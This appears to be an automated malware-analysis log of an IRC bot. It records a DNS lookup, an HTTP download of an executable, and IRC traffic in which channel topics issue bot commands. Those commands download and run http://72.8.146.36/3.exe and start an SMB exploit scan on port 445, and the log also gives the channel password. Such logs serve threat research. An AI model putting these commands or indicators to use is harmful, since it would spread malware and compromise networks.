– DNS Queries:
Name | Query Type | Query Result | Successful | Protocol
mm.esskil99.info | DNS_TYPE_A | 72.8.146.39 | 1 |
– HTTP Conversations:
72.8.146.36:80 – [72.8.146.36]
Request: GET /3.exe
Response: 200 “OK”
– IRC Conversations:
72.8.146.39:17766
Nick: USA|907373
Username: uwerqh
Joined Channel: ##blast,##blast2 with Password fexa0fe
Channel Topic for Channel ##blast2: “.advscan asn1smb 50 2 0 -r”
Channel Topic for Channel ##blast: “.xa0d http://72.8.146.36/3.exe msd.exe 1”
Private Message to Channel ##blast: “[DOWNLOAD]: Downloaded 118.0 KB to msd.exe @ 59.0 KB/sec.”
Private Message to Channel ##blast: “[DOWNLOAD]: Downloading URL: http://72.8.146.36/3.exe to: msd.exe.”
Private Message to Channel ##blast2: “[SCAN]: Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 50 threads.”